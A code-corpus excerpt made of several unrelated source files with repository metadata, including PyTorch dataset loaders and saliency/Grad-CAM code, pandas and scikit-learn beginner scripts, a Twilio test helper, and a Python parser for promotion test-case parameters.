elif reason == ofproto.OFPPR_MODIFY:
self.logger.info("port modified %s", port_no)
else:
self.logger.info("Illeagal port state %s %s", port_no, reason)
| [
"noreply@github.com"
] | XoulKool.noreply@github.com |
906738f6220d65cce1625250b86529ae2a068ae8 | 1d22f82abc38dd85a844cb6a19ec83ffae2a434d | /data_sci_long/solution_dsci_chapter_01_python_review.py | d23f3b9cce6e42e7caa04228aff1a0e49ce801d1 | [] | no_license | pbarton666/learninglab | c4d5602d148618ee2848a4954d8d93eae24be9ef | f2ad15b77aefcf65bd19e00f3f61687b4f13b737 | refs/heads/master | 2022-12-14T05:55:33.346925 | 2021-07-13T17:21:42 | 2021-07-13T17:21:42 | 84,211,135 | 2 | 3 | null | 2022-12-08T06:51:28 | 2017-03-07T14:52:08 | Jupyter Notebook | UTF-8 | Python | false | false | 416 | py | solution_dsci_chapter_01_python_review.py
class Dog():
def __init__(self, name):
self.name=name
class Pack(Dog):
def __init__(self):
self.members=[]
def __add__(self, new):
self.members.append(new.name)
pack=Pack()
for name in ('lassie', 'spicey', 'kelly'):
pack+Dog(name)
print("Yay! There are now {} dog(s):\n{}\n"\
.format(len(pack.members), ', '.join(pack.members)))
x=1 | [
"pbarton@SEB01.COM"
] | pbarton@SEB01.COM |
c6f571894dd7ccf9741d5e68fab1fbc91010d2d7 | 870bb117e3382fc3db8fdf146a96b495da04e1df | /week-03/day-2/38.py | 7719dc748471dcfe008f187b390081623059622c | [] | no_license | approximata/greenfox-weeks | f92b7900437325abbb609ac43e4fe0f8e68a5c36 | a10648d80869fcc151ea7246366f4c4a9e19a768 | refs/heads/master | 2021-01-24T18:59:19.253880 | 2016-08-21T15:17:33 | 2016-08-21T15:17:33 | 86,173,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | numbers = [7, 5, 8, -1, 2]
# Write a function that returns the minimal element
# in a list (your own min function)
def mymin(nu):
minnum=nu[0]
for i in range(len(nu)):
if minnum < nu[i]:
pass
else:
minnum = nu[i]
return minnum
print(mymin(numbers))
| [
"bodormate@gmail.com"
] | bodormate@gmail.com |
fa1bfe93bc5ca8cf885d0b3793c93d010857eca7 | 2f49c92451e81204ed65648f92bb363d0f957658 | /Code/tools/my_dataset.py | 659a45121de63b72b8c1edcff6f02eed2a8396f0 | [] | no_license | luweishuang/Sky-Replacement | 74b40997f50cb5b0153111f5389d813032bdedd9 | e77bec6de444f09e47c6321bea3f2e257dbd1c13 | refs/heads/master | 2023-05-31T02:05:36.028540 | 2021-05-31T09:27:17 | 2021-05-31T09:27:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,642 | py | # -*- coding: utf-8 -*-
import os
import random
import numpy as np
import torch
from PIL import Image
from torch.utils.data import Dataset
from glob import glob
from matplotlib import pyplot as plt
random.seed(1)
rmb_label = {"1": 0, "100": 1}
class RMBDataset(Dataset):
def __init__(self, data_dir, transform=None):
"""
rmb面额分类任务的Dataset
:param data_dir: str, 数据集所在路径
:param transform: torch.transform,数据预处理
"""
self.label_name = {"1": 0, "100": 1}
self.data_info = self.get_img_info(data_dir) # data_info存储所有图片路径和标签,在DataLoader中通过index读取样本
self.transform = transform
def __getitem__(self, index):
path_img, label = self.data_info[index]
img = Image.open(path_img).convert('RGB') # 0~255
if self.transform is not None:
img = self.transform(img) # 在这里做transform,转为tensor等等
return img, label
def __len__(self):
return len(self.data_info)
@staticmethod
def get_img_info(data_dir):
data_info = list()
for root, dirs, _ in os.walk(data_dir):
# 遍历类别
for sub_dir in dirs:
img_names = os.listdir(os.path.join(root, sub_dir))
img_names = list(filter(lambda x: x.endswith('.jpg'), img_names))
# 遍历图片
for i in range(len(img_names)):
img_name = img_names[i]
path_img = os.path.join(root, sub_dir, img_name)
label = rmb_label[sub_dir]
data_info.append((path_img, int(label)))
return data_info
class PortraitDataset(Dataset):
def __init__(self, data_dir, transform=None, in_size=224):
super(PortraitDataset, self).__init__()
self.data_dir = data_dir
self.transform = transform
self.label_path_list = list()
self.in_size = in_size
# 获取mask的path
self._get_img_path()
def __getitem__(self, index):
path_label = self.label_path_list[index]
path_img = path_label[:-10] + ".png"
img_pil = Image.open(path_img).convert('RGB')
img_pil = img_pil.resize((self.in_size, self.in_size), Image.BILINEAR)
label_pil = Image.open(path_label).convert('L')
label_pil = label_pil.resize((self.in_size, self.in_size), Image.NEAREST)
if self.transform is not None:
img_pil = self.transform(img_pil)
label_pil = self.transform(label_pil)
plt.subplot(121).imshow(img_pil)
plt.subplot(122).imshow(label_pil)
plt.show()
img_hwc = np.array(img_pil)
img_chw = img_hwc.transpose((2, 0, 1))
label_hw = np.array(label_pil)
label_hw[label_hw != 0] = 1
label_chw = label_hw[np.newaxis, :, :]
img_chw_tensor = torch.from_numpy(img_chw).float()
label_chw_tensor = torch.from_numpy(label_chw).float()
return img_chw_tensor, label_chw_tensor
def __len__(self):
return len(self.label_path_list)
def _get_img_path(self):
file_list = os.listdir(self.data_dir)
file_list = list(filter(lambda x: x.endswith("_matte.png"), file_list))
path_list = [os.path.join(self.data_dir, name) for name in file_list]
random.shuffle(path_list)
if len(path_list) == 0:
raise Exception("\ndata_dir:{} is a empty dir! Please checkout your path to images!".format(self.data_dir))
self.label_path_list = path_list
class SkyDataset(Dataset):
def __init__(self, data_dir, transform=None, in_size=224):
super(SkyDataset, self).__init__()
self.data_dir = data_dir
self.transform = transform
self.label_path_list = list()
self.in_size = in_size
# 获取img, mask的path
self._get_img_path()
def __getitem__(self, index):
path_label = self.label_path_list[index]
path_img = self.img_path_list[index]
img_pil = Image.open(path_img).convert('RGB')
img_pil = img_pil.resize((self.in_size, self.in_size), Image.BILINEAR)
label_pil = Image.open(path_label).convert('L')
label_pil = label_pil.resize((self.in_size, self.in_size), Image.NEAREST)
if self.transform is not None:
img_pil = self.transform(img_pil)
label_pil = self.transform(label_pil)
# plt.subplot(121).imshow(img_pil)
# plt.subplot(122).imshow(label_pil)
# plt.show()
img_hwc = np.array(img_pil)
img_chw = img_hwc.transpose((2, 0, 1))
label_hw = np.array(label_pil)
label_hw[label_hw != 0] = 1
label_chw = label_hw[np.newaxis, :, :]
img_chw_tensor = torch.from_numpy(img_chw).float()
label_chw_tensor = torch.from_numpy(label_chw).float()
return img_chw_tensor, label_chw_tensor
def __len__(self):
return len(self.label_path_list)
def _get_img_path(self):
img_list = glob(self.data_dir + '/image/*')
label_list = glob(self.data_dir + '/mask/*')
if len(label_list) == 0:
raise Exception("\ndata_dir:{} is a empty dir! Please checkout your path to images!".format(self.data_dir))
if len(label_list) != len(img_list):
raise Exception("\nImages %d and labels %d are inconsistent! Please checkout your dataset!".format(
len(label_list), len(img_list), self.data_dir))
self.label_path_list = label_list
self.img_path_list = img_list
| [
"45333458+HiveYuan@users.noreply.github.com"
] | 45333458+HiveYuan@users.noreply.github.com |
3f3f5ccbe7c5bf0b18fb6e442de445731566796f | 59eaf6824fff579c1cdd89cb8da73f0278f9e2c6 | /subway_data_process/code/divide_train_and_test.py | d243ae7215c6fb4c168a6e0e764e5ad1b9e09f7a | [] | no_license | LinJingOK/BIO-mark | 577cfb3f680583064955d3069de7ab6359f552c8 | 93f7a32405ef7b181bced6a78f9fb7321836fb46 | refs/heads/master | 2023-06-21T20:50:32.517602 | 2021-07-17T04:10:17 | 2021-07-17T04:10:17 | 386,832,445 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py |
from sklearn.model_selection import train_test_split
filename = r'E:\workspace\PycharmProjects\BIO_mark_data\yao\data\data.txt'
with open(filename, 'r') as f:#with语句自动调用close()方法
lines = f.readlines()
data = []
for line in lines:
data.append(line)
# print(data)
train_data, test_data = train_test_split(data, train_size=0.8, test_size=0.2)
with open(r"E:\workspace\PycharmProjects\BIO_mark_data\yao\divide_data\train.txt",'w',encoding='utf-8') as train_outfile:
for line in train_data:
train_outfile.write(line)
with open(r"E:\workspace\PycharmProjects\BIO_mark_data\yao\divide_data\test.txt", 'w',
encoding='utf-8') as test_outfile:
for line in test_data:
test_outfile.write(line)
| [
"425626997@qq.com"
] | 425626997@qq.com |
c18be261a9696d001ec6cbdc3a0a4ebb5ac7a186 | 853a642fc706af530a5fc259d11bd143d46678a6 | /pandas_multiple_tables.py | 1b5736bb2b42d0eb1434082de8e53f4d1ec87dbe | [] | no_license | jgullbrand/pandas_practice | faa74599144badb4803d2d6cb91ad99c3d7d131a | 69b236803bfbc0706bd51a206599247daddf189e | refs/heads/master | 2020-04-27T03:47:52.999739 | 2019-03-07T18:42:20 | 2019-03-07T18:42:20 | 174,035,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,942 | py | # Pandas Multiple Tables
import pandas as pd
# Loading in data from 3 tables: Total Website Visitors, New Visitors, Avg Session Duration
total_visitors = pd.read_csv('visitors.csv')
new_visitors = pd.read_csv('new_visitors.csv')
session_duration = pd.read_csv('session_duration.csv')
# Check out dataframes:
#print(total_visitors)
#print(new_visitors)
#print(session_duration)
# Inner Merge
# Can merge two tables with pd.merge (identifies matching column automatically)
all_visitor_data = pd.merge(total_visitors, new_visitors)
#Add a new visitor column - what % of total visitors were new visitors?
all_visitor_data['New Visitors Percentage'] = round(all_visitor_data.new_website_visitors / all_visitor_data.total_website_visitors,2)
# Merging all three tables - you can do this by "chaining" commands:
all_data = total_visitors.merge(new_visitors).merge(session_duration)
#Rename column header from 'Session Duration' to 'session_duration'
all_data.rename(columns={'Session Duration':'session_duration'}, inplace = True)
#Filter -only show data where 'session_duration' is over 15 seconds
long_avg_session_duration = all_data[all_data.session_duration > 15]
#-------
#Looking at two new data files. Customer info + Website Sales
customers = pd.read_csv('customers.csv')
website_sales = pd.read_csv('website_sales.csv')
#print(customers)
#print(website_sales)
#Merge on columns when the names don't match. Use left_on and right_on:
customer_sales_data = pd.merge(customers, website_sales,
left_on='id', right_on='customer_id')
#print(customer_sales_data)
# Printing this data shows 1) It renamed the two id columns id x & id y
# and 2) it removed the row that we didn't have a matching customer id for
# Let's rename the id columns and keep all data by using an 'outer join'
all_customer_sales_data = pd.merge(customers, website_sales,
left_on='id', right_on='customer_id',
how = 'outer',
suffixes=['_customers', '_sales'])
#print(all_customer_sales_data)
# view only rows with null sales data
null_sales_data = all_customer_sales_data[all_customer_sales_data.total_sales.isnull()]
# Count the number of rows with null sales data
count_null_sales_data = len(null_sales_data)
# left merge
customer_data_left_merge = pd.merge(customers, website_sales,
left_on='id', right_on='customer_id',
how = 'left',
suffixes=['_customers', '_sales'])
#print(customer_data_left_merge)
# right merge
customer_data_left_right = pd.merge(customers, website_sales,
left_on='id', right_on='customer_id',
how = 'right',
suffixes=['_customers', '_sales'])
#print(customer_data_left_right)
#-------
#Concatenate DataFrames
customers = pd.read_csv('customers.csv')
customers_two = pd.read_csv('customers_two.csv')
combined_customer_data = pd.concat([customers, customers_two]).reset_index(drop=True)
print(combined_customer_data)
| [
"jamiegullbrand@gmail.com"
] | jamiegullbrand@gmail.com |
30fc26e6e36c45d244ad025f815fe97fb27bdda0 | 930c7154b221dd0133766263efc8afab1aaed914 | /tests/base.py | 3696a41433129f466f43bff2d350ef613147ed1d | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | isabella232/ri-group-communication-toolkit | f212c92ec52e2e09cc065b08796f1bf988f08e5b | 9b0cc2f151f12ba072b3a932099b796e89d67009 | refs/heads/master | 2023-04-12T23:29:22.551824 | 2014-04-24T23:45:15 | 2014-04-24T23:45:15 | 358,573,545 | 1 | 1 | null | 2021-04-16T11:16:59 | 2021-04-16T11:15:15 | null | UTF-8 | Python | false | false | 774 | py | from unittest import TestCase
from mock import patch, Mock
class KitTestCase(TestCase):
def start_patch(self, tool):
# Patch all requests to twilio_numbers()
self.twilio_numbers_patcher = patch('rapid_response_kit.tools.{}.twilio_numbers'.format(tool))
self.twilio_numbers_patch = self.twilio_numbers_patcher.start()
self.twilio_numbers_patch.return_value = []
# Patch all requests to twilio()
self.twilio_patcher = patch('rapid_response_kit.tools.{}.twilio'.format(tool))
self.twilio_patch = self.twilio_patcher.start()
self.patchio = Mock()
self.twilio_patch.return_value = self.patchio
def stop_patch(self):
self.twilio_numbers_patcher.stop()
self.twilio_patcher.stop()
| [
"matt@twilio.com"
] | matt@twilio.com |
6a370d78124dbc1a87f7a1d28a4f4f21efd1fbe4 | 33fec8d24705bc2c0a1502d55b610b6645326278 | /bin/sqlformat | deb363fd5ad0692549e972167397f58755f730c9 | [] | no_license | bramsteenbergen/ProductManagar | 402899e69bd9554088e09ecda69654dfb1ed8cf1 | ea20539ee61c92afb3edd22b37864de7205341b0 | refs/heads/master | 2022-12-09T05:11:10.135943 | 2020-09-24T05:33:25 | 2020-09-24T05:33:25 | 288,982,305 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | #!/home/trie/Desktop/Dev/testEnv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"triemond@outlook.com"
] | triemond@outlook.com | |
3b9318472539ec290ac5c2d9f2f2b21c8d5e35c8 | b7eed26cf8a0042a61f555eed1e9bf0a3227d490 | /students/lakatorz_izaak/lesson_06_dicts_tuples_sets_args_kwargs/countries_and_cities.py | 38dcb815c191412dfaa63d982415397d1c37151c | [] | no_license | jedzej/tietopythontraining-basic | e8f1ac5bee5094c608a2584ab19ba14060c36dbe | a68fa29ce11942cd7de9c6bbea08fef5541afa0f | refs/heads/master | 2021-05-11T11:10:05.110242 | 2018-08-20T12:34:55 | 2018-08-20T12:34:55 | 118,122,178 | 14 | 84 | null | 2018-08-24T15:53:04 | 2018-01-19T12:23:02 | Python | UTF-8 | Python | false | false | 490 | py | def main():
cc_pairs = dict()
results = dict()
country_number = int(input())
for i in range(country_number):
country_name, cities = input().split(' ', 1)
for city in cities.split():
cc_pairs[city] = country_name
city_number = int(input())
for i in range(city_number):
city_to_check = input()
results[i] = cc_pairs[city_to_check]
for v in results.values():
print(v)
if __name__ == '__main__':
main()
| [
"ext-izaak.lakatorz@here.com"
] | ext-izaak.lakatorz@here.com |
023a07fe0e546c56cc62618d41f849445a7aff55 | dec17e1df09b5b6426bef5d67cbe555031018317 | /lib/gradients.py | 9c2e579bb2f5104882421e9891045ed4cdd286dc | [
"MIT"
] | permissive | codeaudit/pytorch-smoothgrad | 364b3d8852f867b93b74c9b6940af399a9a59a33 | d6bb9f96ea8f59f89e72fb2136d8d48e0713eca0 | refs/heads/master | 2021-01-01T20:18:02.842154 | 2017-07-28T15:28:38 | 2017-07-28T15:28:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,969 | py | import numpy as np
import cv2
import torch
from torch.autograd import Variable
class VanillaGrad(object):
def __init__(self, pretrained_model, cuda=False):
self.pretrained_model = pretrained_model
self.features = pretrained_model.features
self.cuda = cuda
if self.cuda:
self.pretrained_model.cuda()
self.pretrained_model.eval()
def __call__(self, x, index=None):
output = self.pretrained_model(x)
if index is None:
index = np.argmax(output.data.cpu().numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = Variable(torch.from_numpy(one_hot), requires_grad=True)
if self.cuda:
one_hot = one_hot.cuda()
one_hot = torch.sum(one_hot * output)
one_hot.backward(retain_variables=True)
grad = x.grad.data.cpu().numpy()
grad = grad[0, :, :, :]
return grad
class SmoothGrad(VanillaGrad):
def __init__(self, pretrained_model, cuda=False, stdev_spread=0.15, n_samples=25, magnitude=True):
super(SmoothGrad, self).__init__(pretrained_model, cuda)
self.stdev_spread = stdev_spread
self.n_samples = n_samples
self.magnitutde = magnitude
def __call__(self, x, index=None):
x = x.data.cpu().numpy()
stdev = self.stdev_spread * (np.max(x) - np.min(x))
total_gradients = np.zeros_like(x)
for i in range(self.n_samples):
noise = np.random.normal(0, stdev, x.shape).astype(np.float32)
x_plus_noise = x + noise
x_plus_noise = Variable(torch.from_numpy(x_plus_noise), requires_grad=True)
if self.cuda:
x_plus_noise = x_plus_noise.cuda()
output = self.pretrained_model(x_plus_noise)
if index is None:
index = np.argmax(output.data.cpu().numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = Variable(torch.from_numpy(one_hot), requires_grad=True)
if self.cuda:
one_hot = one_hot.cuda()
one_hot = torch.sum(one_hot * output)
if x_plus_noise.grad is not None:
x_plus_noise.grad.data.zero_()
one_hot.backward(retain_variables=True)
grad = x_plus_noise.grad.data.cpu().numpy()
if self.magnitutde:
total_gradients += (grad * grad)
else:
total_gradients += grad
avg_gradients = total_gradients[0, :, :, :] / self.n_samples
return avg_gradients
class GuidedBackpropReLU(torch.autograd.Function):
def forward(self, input):
pos_mask = (input > 0).type_as(input)
output = torch.addcmul(
torch.zeros(input.size()).type_as(input),
input,
pos_mask)
self.save_for_backward(input, output)
return output
def backward(self, grad_output):
input, output = self.saved_tensors
pos_mask_1 = (input > 0).type_as(grad_output)
pos_mask_2 = (grad_output > 0).type_as(grad_output)
grad_input = torch.addcmul(
torch.zeros(input.size()).type_as(input),
torch.addcmul(torch.zeros(input.size()).type_as(input), grad_output, pos_mask_1),
pos_mask_2)
return grad_input
class GuidedBackpropGrad(VanillaGrad):
def __init__(self, pretrained_model, cuda=False):
super(GuidedBackpropGrad, self).__init__(pretrained_model, cuda)
for idx, module in self.features._modules.items():
if module.__class__.__name__ is 'ReLU':
self.features._modules[idx] = GuidedBackpropReLU()
class GuidedBackpropSmoothGrad(SmoothGrad):
def __init__(self, pretrained_model, cuda=False, stdev_spread=.15, n_samples=25, magnitude=True):
super(GuidedBackpropSmoothGrad, self).__init__(pretrained_model, cuda)
self.stdev_spread = stdev_spread
self.n_samples = n_samples
self.magnitutde = magnitude
for idx, module in self.features._modules.items():
if module.__class__.__name__ is 'ReLU':
self.features._modules[idx] = GuidedBackpropReLU()
class FeatureExtractor(object):
def __init__(self, model, target_layers):
self.model = model
self.features = model.features
self.target_layers = target_layers
self.gradients = []
def __call__(self, x):
target_activations, output = self.extract_features(x)
output = output.view(output.size(0), -1)
output = self.model.classifier(output)
return target_activations, output
def get_gradients(self):
return self.gradients
def save_gradient(self, grad):
self.gradients.append(grad)
def extract_features(self, x):
outputs = []
for name, module in self.features._modules.items():
x = module(x)
if name in self.target_layers:
x.register_hook(self.save_gradient)
outputs += [x]
return outputs, x
class GradCam(object):
def __init__(self, pretrained_model, target_layer_names, cuda):
self.pretrained_model = pretrained_model
self.cuda = cuda
if self.cuda:
self.pretrained_model.cuda()
self.pretrained_model.eval()
self.extractor = FeatureExtractor(self.pretrained_model, target_layer_names)
def __call__(self, x, index=None):
#output = self.pretrained_model(x)
features, output = self.extractor(x)
if index is None:
index = np.argmax(output.data.cpu().numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = Variable(torch.from_numpy(one_hot), requires_grad=True)
if self.cuda:
one_hot = one_hot.cuda()
one_hot = torch.sum(one_hot * output)
self.pretrained_model.zero_grad()
one_hot.backward(retain_variables=True)
grads = self.extractor.get_gradients()[-1].data.cpu().numpy()
target = features[-1].data.cpu().numpy()[0, :]
weights = np.mean(grads, axis=(2, 3))[0, :]
cam = np.ones(target.shape[1:], dtype=np.float32)
for i, w in enumerate(weights):
cam += w * target[i, :, :]
cam = np.maximum(cam, 0)
cam = cv2.resize(cam, (224, 224))
cam = cam - np.min(cam)
cam = cam / np.max(cam)
return cam
| [
"pkdn14@gmail.com"
] | pkdn14@gmail.com |
3bf3d5decb996dc83da753ea3597dd1bbbc55da4 | 12fdd1d25aedf9ee00199373606991f92c28ed66 | /util/param_parser/param_parser.py | 3877336d651d5bf3941a64fc13d2a422cb5872b3 | [] | no_license | SHOST628/ESPOS82_Promotion_AutoTest | ff0e6eb038c3ca349fa666bad0b89fb65d6b71ff | df7d9614d132141738d301279bbacab8be6e4fbc | refs/heads/master | 2023-04-05T12:42:17.760953 | 2021-04-20T07:18:56 | 2021-04-20T07:18:56 | 335,235,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,282 | py | from util.mylogger import logger
from util.oracle import oracle
from util.param_format_log import param_model
import re
REQUEST = 0
RESPONSE = 1
def param_extractor(prom_param, config_prom_param):
"""
promotion param extrator
:param config_prom_param: str, from promotion parameter
:param config_prom_param: str, from config.ini
:return: common promtion parameters list
"""
if config_prom_param == '' or config_prom_param is None:
return []
prom_params = ['-'+ param.strip() for param in config_prom_param.split(',')]
config_prom_param = ','.join(prom_params)
config_prom_param = re.sub(r',', '|', config_prom_param)
pattern = re.compile(r'{}'.format(config_prom_param))
common_prom_params = pattern.findall(prom_param)
common_prom_params = [param.replace('-', '') for param in common_prom_params]
common_prom_params = list(set(common_prom_params))
return common_prom_params
def param_extractors(promids, config_prom_param):
"""
parse common promotion parameters
:param promids: list
:param config_prom_param: str
:return: common promtion parameters list
"""
prom_param = ''
prom_param_list = []
prom_param_sql = ''
for promid in promids:
prom_param_sql = "select xf_parameter0 from xf_promitem where xf_promid = '{}'".format(promid)
prom_param += oracle.select(prom_param_sql)[0][0]
prom_param_list = param_extractor(prom_param, config_prom_param)
return prom_param_list
def to_dict(test_cls, key, value):
"""
turn str into dict, just for testcase['VIPINFO'], testcase['PROMLESSDETAIL'] for example,
1)str: promid=10001,vipgradecenter=* --> dict: {'promid':'10001', 'vipgradecenter':'*'}
for testcase['PROMLESSDETAIL']:
2)str: PEOHQO200900015=100&50,PEOHQO201100031=130 --> {'PEOHQO200900015':['100', '50'], 'PEOHQO201100031':'30'}
:param test_cls:
:param key: testcase key
:param value: testcase value
:return:
"""
if value is None:
logger.debug('TESTCASE 中 【{}】的值为空 '.format(key))
return
elif value.strip() == '':
logger.debug('TESTCASE 中 【{}】的值为空 '.format(key))
return
elif '=' in value:
dic = {}
count_equal = value.count('=')
count_comma = value.count(',')
if count_equal == count_comma + 1:
kvs = value.split(',')
for kv in kvs:
k, v = kv.split('=')
if k.strip() == '' or v.strip() == '':
test_cls._testMethodDoc += "<br><font color='red' style='font-weight:bold'> TESTCASE 下【{}】的值为:{} ,填写格式不正确 </font>".format(key, value)
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest('TESTCASE 下【{}】的值为:{} ,填写格式不正确'.format(key, value))
contain_num = re.search(r'\d+', k.strip())
if contain_num is None:
k = k.lower().strip()
v = v.strip()
else:
k = k.strip()
v = v.strip()
# just for testcase['PROMLESSDETAIL']
if '&' in v:
v = v.split('&')
v = [i.strip() for i in v]
dic[k] = v
return dic
test_cls._testMethodDoc += "<br><font color='red' style='font-weight:bold'> TESTCASE 下【{}】的值为:{} ,填写格式不正确</font>".\
format(key, value)
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest('TESTCASE 下【{}】的值为:{} ,填写格式不正确'.format(key, value))
test_cls._testMethodDoc += "<br><font color='red' style='font-weight:bold'> TESTCASE 下【{}】的值为:{} ,填写格式不正确 </font>".\
format(key, value)
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest('TESTCASE 下【{}】的值为:{} ,填写格式不正确'.format(key, value))
def _param_to_dict(test_cls, key, value, request_response):
"""
turn str into dict, for example,
str: promid=10001,vipgradecenter=*;vipbonuscenter=* --> dict: {'request':{'promid':'10001','vipgradecenter':'*'}, 'response':{'vipbonuscenter':'*'}}
symbol priority: ; > # > : > , > =
如:
1)PROMPARAM_XE 中填写 ;PEOHQO201100036:bonusGive=1070 --> dict: {'response':{'PEOHQO201100036':{'bonusGive':1070}}}
2)PROMPARAM_XE 中填写 ;PEOHQO201100036:bonusGive=1070&1080 --> dict: {'response':{'PEOHQO201100036':[{'bonusGive':1070},{'bonusGive':1080}]}}
:param dict_str:
:return: the key and value are string for example, {'request': None, 'reponse': xxx} {'request':xxx, 'response':{xxx:xxx}}
"""
test_method_doc = "<br><font color='red' style='font-weight:bold'> TESTCASE 下" \
"【{}】的值为:{} ,填写格式不正确</font>"
test_doc = 'TESTCASE 下【{}】的值为:{} ,填写格式不正确'
# 用于转换TESTCASE中 PROMPARAM_XX 字段的数据
if value is None:
logger.debug('TESTCASE 中 【{}】的值为空 '.format(key))
return
elif value.strip() == '':
logger.debug('TESTCASE 中 【{}】的值为空 '.format(key))
return
elif ';' in value:
if value.count(';') >1:
test_cls._testMethodDoc += "<br><font color='red' style='font-weight:bold'> TESTCASE 下" \
"【{}】的值为:{} ,填写格式不正确,不能存在两个或以上的 ';'</font>".format(key, value)
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest("【{}】的值为:{} ,填写格式不正确,不能存在两个或以上的 ';'".format(key, value))
req, res = value.split(';')
# deal with the promble that one item exists multi promid
t_dict = {}
if request_response:
res = res.strip()
prom_check_dict = {}
# 处理 -XP case, 临时保存batchs的数据
rep_tmp = None
pattern = re.compile(r'\{.*?\}')
rep_tmp = pattern.findall(res)
res_replace = None
if rep_tmp != []:
sub_pattern = '|'.join(rep_tmp)
# ;PEOHQO210400007:batchs={batchNo=HQ003,qty=1#batchNo=HQ004,qty=1},packCode=01 取代后
# ;PEOHQO210400007:batchs=batchs,packCode=01
res_replace = re.sub(r'{}'.format(sub_pattern), 'batchs', res)
else:
res_replace = res
response_checks = res_replace.split('#')
for check in response_checks:
if check is None:
pass
elif check.strip() == '':
pass
else:
if ':' in check:
prom_check = check.split(':')
if prom_check[0] is None or prom_check[0].strip() == '':
test_cls._testMethodDoc += test_method_doc.format(key, value)
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest(test_doc.format(key, value))
else:
if prom_check[1] is None or prom_check[1].strip() == '':
test_cls._testMethodDoc += test_method_doc.format(key, value)
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest(test_doc.format(key, value))
else:
# prom_check_dict = {}
prom_check_key = prom_check[0]
prom_check_value = to_dict(test_cls, key, prom_check[1])
if prom_check_value is None:
test_cls._testMethodDoc += test_method_doc.format(key, value)
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest(test_doc.format(key, value))
else:
prom_check_dict[prom_check_key] = prom_check_value
t_dict['response'] = prom_check_dict
else:
test_cls._testMethodDoc += test_method_doc.format(key, value)
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest(test_doc.format(key, value))
if rep_tmp != []:
# ;PEOHQO210400007:batchs={batchNo=HQ003,qty=1#batchNo=HQ004,qty=1},packCode=01
# {'response': {'PEOHQO210400007':{'batchs':[{'batchNo':'HQ003','qty':1},{'batchNo':'HQ004','qty':1}],'packCode':'01'}}}
i = 0
res_assertion = t_dict['response']
for k, v in res_assertion.items():
batchs = []
tmp_ = rep_tmp[i].lstrip('{')
tmp_ = tmp_.rstrip('}')
batch = tmp_.split('#')
for b in batch:
if b.strip() == '':
pass
else:
batch_dict = to_dict(test_cls, key, b.strip())
batchs.append(batch_dict)
res_assertion[k]['batchs'] = batchs
i += 1
t_dict['response'] = res_assertion
return t_dict
else:
return t_dict
else:
req = req.strip()
if '#' in req:
t_dict['request'] = []
r_param_list = req.split('#')
for param in r_param_list:
if param.strip() == '':
pass
else:
req_dict = to_dict(test_cls, key, param.strip())
t_dict['request'].append(req_dict)
else:
req_dict = to_dict(test_cls, key, req.strip())
t_dict['request'] = req_dict
return t_dict
else:
test_cls._testMethodDoc += test_method_doc.format(key, value)
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest(test_doc.format(key, value))
def get_param_to_dict(test_cls, key, testcase, request_response, *need_params):
"""
to solve the problem that PROMPARAM_XX value whether exist in testcase
:param test_cls:
:param key: need to get testcase key
:param testcase:
:param request_response: 0 : request , 1 : reponse
:param need_params: to check whether the data is completed
:return: if_request = 0, return list including dict ; if_request = 1, return list including dict
"""
Flag = True
# need_params_ = ['\b{}\b'.format(param) for param in need_params]
need_params_ = ['{}'.format(param) for param in need_params]
need_param = '|'.join(need_params_)
results = []
test_method_doc = "<br><font color='red' style='font-weight:bold'>TestCase中【{}】的数据需要包含:{}</font>"
skip_test_info = "TestCase 中 {} 的数据需要包含: {}"
for i, row in enumerate(testcase):
if row[key] is None:
if request_response == 0:
results.append({'request': None})
else:
results.append({'response': None})
elif row[key].strip() == '':
if request_response == 0:
results.append({'request': None})
else:
results.append({'response': None})
elif len(list(set(re.findall(r'{}'.format(need_param), row[key], flags=re.IGNORECASE)))) == len(need_params):
if re.findall(need_param, row[key], flags=re.IGNORECASE):
# todo 判断PROMPARAM_XX 的value是否存在需要的促销参数
promparam = _param_to_dict(test_cls, key, row[key], request_response)
Flag = False
if request_response == 0:
results.append(promparam)
else:
results.append(promparam)
else:
test_cls._testMethodDoc += test_method_doc.format(key, ','.join(need_params))
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest(skip_test_info.format(key, ','.join(need_params)))
else:
test_cls._testMethodDoc += test_method_doc.format(key, ','.join(need_params))
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest(skip_test_info.format(key, ','.join(need_params)))
if Flag:
test_cls._testMethodDoc += test_method_doc.format(key, ','.join(need_params))
test_cls._testMethodDoc += param_model(key)
test_cls.skipTest(skip_test_info.format(key, ','.join(need_params)))
return results
def exclude_case(test_cls, testcaseid, skip_caseids):
"""
not to execute testcase in excluding cases
:param test_cls:
:param testcaseid:
:param skip_caseids: str
:return:
"""
if skip_caseids.strip() == '':
return
skips_ = skip_caseids.split(',')
skip_caseids_tmp = []
skip_caseids_range = []
for caseid in skips_:
if '-' in caseid:
range = caseid.split('-')
min = range[0].strip()
max = range[1].strip()
if min != '' and max != '':
if max < min:
min, max = max, min
skip_caseids_range.append([min, max])
skip_caseids_tmp.append(caseid)
if testcaseid in skip_caseids_tmp:
test_cls.skipTest('属于指定排除的TestCase')
elif skip_caseids_range != []:
for range in skip_caseids_range:
min, max = range
